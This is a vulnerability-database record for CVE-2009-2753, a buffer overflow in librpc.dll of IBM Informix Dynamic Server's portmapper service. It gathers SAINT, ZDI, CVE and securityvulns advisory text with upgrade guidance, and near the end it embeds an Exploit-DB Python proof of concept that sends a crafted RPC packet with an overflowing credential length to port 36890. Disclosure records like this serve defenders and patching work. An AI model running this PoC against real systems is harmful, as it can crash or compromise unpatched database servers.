Informix Dynamic Server is a database solution from IBM. It includes a portmapper service which listens for connections on port 36890/TCP and uses librpc.dll.
Problem
A buffer overflow vulnerability in librpc.dll allows remote attackers to execute arbitrary commands by sending a request containing an invalid credentials length parameter to the portmapper service.
Resolution
Upgrade to version 10.00.TC9, 10.00.TC10, 11.10.TC3, or 11.10.TC4 or higher.
References
<http://secunia.com/advisories/38731>
Limitations
Exploit works on Informix Dynamic Server 11.10.TC1 on Windows Server 2003 SP2 with security updates KB956802 and KB956572 installed and DEP disabled.
Platforms
Windows Server 2003
{"enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2753"]}, {"type": "saint", "idList": ["SAINT:B265BA7F4A8E365988E9F0960416BA2C", "SAINT:F1C713FF953F799EA6E80E6BA7A51D4E"]}, {"type": "zdi", "idList": ["ZDI-10-022"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:23327", "SECURITYVULNS:VULN:10673"]}, {"type": "exploitdb", "idList": ["EDB-ID:12109"]}], "modified": "2016-10-03T15:01:57"}, "vulnersScore": 7.5}, "reporter": "SAINT Corporation", "id": "SAINT:8643032B23B2209EDED2D5304ECDE3E7", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "published": "2010-06-10T00:00:00", "history": [], "bulletinFamily": "exploit", "viewCount": 1, "objectVersion": "1.2", "modified": "2010-06-10T00:00:00", "hash": "c777d2d47f528e0c1b76e4d00fc794fb16ff24136c009bfe8eee791a334e7675", "references": [], "cvelist": ["CVE-2009-2753"], "description": "Added: 06/10/2010 \nCVE: [CVE-2009-2753](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2753>) \nBID: [38471](<http://www.securityfocus.com/bid/38471>) \nOSVDB: [62783](<http://www.osvdb.org/62783>) \n\n\n### Background\n\n[Informix Dynamic Server](<http://www-306.ibm.com/software/data/informix/ids/>) is a database solution from IBM. It includes a portmapper service which listens for connections on port 36890/TCP and uses librpc.dll. \n\n### Problem\n\nA buffer overflow vulnerability in librpc.dll allows remote attackers to execute arbitrary commands by sending a request containing an invalid credentials length parameter to the portmapper service. \n\n### Resolution\n\nUpgrade to version 10.00.TC9, 10.00.TC10, 11.10.TC3, or 11.10.TC4 or higher. \n\n### References\n\n<http://secunia.com/advisories/38731> \n\n\n### Limitations\n\nExploit works on Informix Dynamic Server 11.10.TC1 on Windows Server 2003 SP2 with security updates KB956802 and KB956572 installed and DEP disabled. \n\n### Platforms\n\nWindows Server 2003 \n \n\n", "type": "saint", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/informix_librpc_credentials_length", "lastseen": "2016-10-03T15:01:57", "edition": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "c55b0124a50e59b166788caa4f86fe21", "key": "cvelist"}, {"hash": "aff19e7d2f5800fbf65dc3d944df032a", "key": "cvss"}, {"hash": "7a6e4630019139506a4df521771cc9a4", "key": "description"}, {"hash": "8643032b23b2209eded2d5304ecde3e7", "key": "href"}, {"hash": "d505eb7736c3a0d905a1f375971779b5", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "d505eb7736c3a0d905a1f375971779b5", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "a2e6da74c8b179f121f93bda28c97a91", "key": "reporter"}, {"hash": "cdfd36d7a5329b9dae43b629d127419b", "key": "title"}, {"hash": "2a4c1f6b0cd88cf3fac4b56bd4283522", "key": "type"}], "title": "Informix Dynamic Server librpc.dll credentials length buffer overflow"}
{"cve": [{"lastseen": "2018-10-11T11:33:53", "bulletinFamily": "NVD", "description": "Multiple buffer overflows in the authentication functionality in librpc.dll in the Informix Storage Manager (ISM) Portmapper service (aka portmap.exe), as used in IBM Informix Dynamic Server (IDS) 10.x before 10.00.TC9 and 11.x before 11.10.TC3, allow remote attackers to execute arbitrary code via a crafted parameter size.", "modified": "2018-10-10T15:42:10", "published": "2010-03-05T11:30:00", "id": "CVE-2009-2753", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2753", "title": "CVE-2009-2753", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2016-12-14T16:58:04", "bulletinFamily": "exploit", "description": "Added: 06/10/2010 \nCVE: [CVE-2009-2753](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2753>) \nBID: [38471](<http://www.securityfocus.com/bid/38471>) \nOSVDB: [62783](<http://www.osvdb.org/62783>) \n\n\n### Background\n\n[Informix Dynamic Server](<http://www-306.ibm.com/software/data/informix/ids/>) is a database solution from IBM. It includes a portmapper service which listens for connections on port 36890/TCP and uses librpc.dll. \n\n### Problem\n\nA buffer overflow vulnerability in librpc.dll allows remote attackers to execute arbitrary commands by sending a request containing an invalid credentials length parameter to the portmapper service. \n\n### Resolution\n\nUpgrade to version 10.00.TC9, 10.00.TC10, 11.10.TC3, or 11.10.TC4 or higher. \n\n### References\n\n<http://secunia.com/advisories/38731> \n\n\n### Limitations\n\nExploit works on Informix Dynamic Server 11.10.TC1 on Windows Server 2003 SP2 with security updates KB956802 and KB956572 installed and DEP disabled. \n\n### Platforms\n\nWindows Server 2003 \n \n\n", "modified": "2010-06-10T00:00:00", "published": "2010-06-10T00:00:00", "id": "SAINT:B265BA7F4A8E365988E9F0960416BA2C", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/informix_librpc_credentials_length", "type": "saint", "title": "Informix Dynamic Server librpc.dll credentials length buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:10", "bulletinFamily": "exploit", "description": "Added: 06/10/2010 \nCVE: [CVE-2009-2753](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2753>) \nBID: [38471](<http://www.securityfocus.com/bid/38471>) \nOSVDB: [62783](<http://www.osvdb.org/62783>) \n\n\n### Background\n\n[Informix Dynamic Server](<http://www-306.ibm.com/software/data/informix/ids/>) is a database solution from IBM. It includes a portmapper service which listens for connections on port 36890/TCP and uses librpc.dll. \n\n### Problem\n\nA buffer overflow vulnerability in librpc.dll allows remote attackers to execute arbitrary commands by sending a request containing an invalid credentials length parameter to the portmapper service. \n\n### Resolution\n\nUpgrade to version 10.00.TC9, 10.00.TC10, 11.10.TC3, or 11.10.TC4 or higher. \n\n### References\n\n<http://secunia.com/advisories/38731> \n\n\n### Limitations\n\nExploit works on Informix Dynamic Server 11.10.TC1 on Windows Server 2003 SP2 with security updates KB956802 and KB956572 installed and DEP disabled. \n\n### Platforms\n\nWindows Server 2003 \n \n\n", "modified": "2010-06-10T00:00:00", "published": "2010-06-10T00:00:00", "id": "SAINT:F1C713FF953F799EA6E80E6BA7A51D4E", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/informix_librpc_credentials_length", "title": "Informix Dynamic Server librpc.dll credentials length buffer overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:33", "bulletinFamily": "software", "description": "ZDI-10-022: IBM Informix librpc.dll Multiple Remote Code Execution\r\nVulnerabilities\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-10-022\r\nMarch 1, 2010\r\n\r\n-- CVE ID:\r\nCVE-2009-2753\r\n\r\n-- Affected Vendors:\r\nIBM\r\n\r\n-- Affected Products:\r\nIBM Informix\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 5937. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows attackers to execute arbitrary code on\r\nvulnerable installations of both IBM Informix Dynamic Server and EMC\r\nLegato Networker. User interaction is not required to exploit this\r\nvulnerability.\r\n\r\nThe specific flaws exist within the RPC protocol parsing library,\r\nlibrpc.dll, utilized by the ISM Portmapper service (portmap.exe) bound\r\nby default to TCP port 36890. During authentication, a lack of proper\r\nsanity checking on supplied parameter sizes can result in exploitable\r\nstack and heap based buffer overflows leading to arbitrary code\r\nexecution under the context of the SYSTEM user.\r\n\r\n-- Vendor Response:\r\nIBM states that this issue was first fixed in: IDS 10.00.TC9, IDS\r\n11.10.TC3 Recommended fix pack version: IDS 10.00.TC10, IDS 11.10.TC3 4.\r\nURL to APAR or fixpack Fix pack download URL:\r\nhttp://www-933.ibm.com/support/fixcentral/\r\nAPAR URLs \r\n http://www.ibm.com/support/docview.wss?uid=swg1IC55329\r\n http://www.ibm.com/support/docview.wss?uid=swg1IC55330\r\n\r\n-- Disclosure Timeline:\r\n2008-02-07 - Vulnerability reported to vendor\r\n2010-03-01 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Sebastian Apelt (sebastian.apelt@siberas.de)\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/", "modified": "2010-03-04T00:00:00", "published": "2010-03-04T00:00:00", "id": "SECURITYVULNS:DOC:23327", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23327", "title": "ZDI-10-022: IBM Informix librpc.dll Multiple Remote Code Execution Vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:36", "bulletinFamily": "software", "description": "Multiple buffer overflows and integer overflows.", "modified": "2010-03-04T00:00:00", "published": "2010-03-04T00:00:00", "id": "SECURITYVULNS:VULN:10673", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10673", "title": "librpc.dll library multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdi": [{"lastseen": "2016-11-09T00:18:00", "bulletinFamily": "info", "description": "This vulnerability allows attackers to execute arbitrary code on vulnerable installations of both IBM Informix Dynamic Server. User interaction is not required to exploit this vulnerability.\n\nThe specific flaws exist within the RPC protocol parsing library, librpc.dll, utilized by the ISM Portmapper service (portmap.exe) bound by default to TCP port 36890. During authentication, a lack of proper sanity checking on supplied parameter sizes can result in exploitable stack and heap based buffer overflows leading to arbitrary code execution under the context of the SYSTEM user.", "modified": "2010-11-09T00:00:00", "published": "2010-03-01T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-10-022", "id": "ZDI-10-022", "title": "IBM Informix librpc.dll Multiple Remote Code Execution Vulnerabilities", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T15:43:38", "bulletinFamily": "exploit", "description": "Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability. CVE-2009-2753,CVE-2009-2754. Dos exploits for multiple platform", "modified": "2010-04-08T00:00:00", "published": "2010-04-08T00:00:00", "id": "EDB-ID:12109", "href": "https://www.exploit-db.com/exploits/12109/", "type": "exploitdb", "title": "Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability", "sourceData": "# Exploit Title: ZDI-10-023: Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability\r\n# Date: 2010-04-08\r\n# Author: ZSploit.com\r\n# Software Link: N/A\r\n# Version: N/A\r\n# Tested on: IBM Informix Dynamic Server 10.0\r\n# CVE : CVE-2009-2754\r\n\r\n#! /usr/bin/env python\r\n###############################################################################\r\n## File : zs_ids_rpc.py\r\n## Description:\r\n## :\r\n## Created_On : Mar 21 2010\r\n##\r\n## (c) Copyright 2010, ZSploit.com. all rights reserved.\r\n###############################################################################\r\n\"\"\"\r\nThe issue in __lgto_svcauth_unix():\r\n\r\n.text:1000B8E1 mov [ebp+0], eax\r\n.text:1000B8E4 mov eax, [ebx]\r\n.text:1000B8E6 push eax ; netlong\r\n.text:1000B8E7 add ebx, 4\r\n.text:1000B8EA call esi ; ntohl ; Get length of hostname\r\n.text:1000B8EC cmp eax, 0FFh ; Signedness error, if we give 0xffffffff(-1) will pass this check\r\n.text:1000B8F1 jle short loc_1000B8FD\r\n.text:1000B8F3 mov esi, 1\r\n.text:1000B8F8 jmp loc_1000B9D5\r\n.text:1000B8FD ; ---------------------------------------------------------------------------\r\n.text:1000B8FD\r\n.text:1000B8FD loc_1000B8FD: ; CODE XREF: __lgto_svcauth_unix+71\u0018j\r\n.text:1000B8FD mov edi, [ebp+4]\r\n.text:1000B900 mov ecx, eax\r\n.text:1000B902 mov edx, ecx\r\n.text:1000B904 mov esi, ebx\r\n.text:1000B906 shr ecx, 2\r\n.text:1000B909 rep movsd ; call memcpy here with user-supplied size cause a stack overflow\r\n.text:1000B90B mov ecx, edx\r\n.text:1000B90D add eax, 3\r\n.text:1000B910 and ecx, 3\r\n.text:1000B913 rep movsb\r\n\"\"\"\r\n\r\nimport sys\r\nimport socket\r\n\r\nif (len(sys.argv) != 2):\r\n print \"Usage:\\t%s [target]\" % sys.argv[0]\r\n sys.exit(0)\r\n\r\n\r\ndata = \"\\x80\\x00\\x00\\x74\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\" \\\r\n \"\\x00\\x01\\x86\\xb1\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\" \\\r\n \"\\x00\\x00\\x00\\x4c\\x00\\x00\\xd6\\x45\\xff\\xff\\xff\\xff\\x41\\x41\\x41\\x41\" \\\r\n \"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x00\\x00\\x00\\x00\" \\\r\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0a\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\" \\\r\n \"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\" \\\r\n \"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\" \\\r\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\r\nhost = sys.argv[1]\r\nport = 36890\r\n\r\nprint \"PoC for ZDI-10-023 by ZSploit.com\"\r\ntry:\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n s.connect((host, port))\r\n s.send(data)\r\n print \"Sending payload ..\"\r\n except:\r\n print \"Error in send\"\r\n print \"Done\"\r\nexcept:\r\n print \"Error in socket\"\r\n\r\nThe ZSploit Team\r\nhttp://zsploit.com\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/12109/"}]}
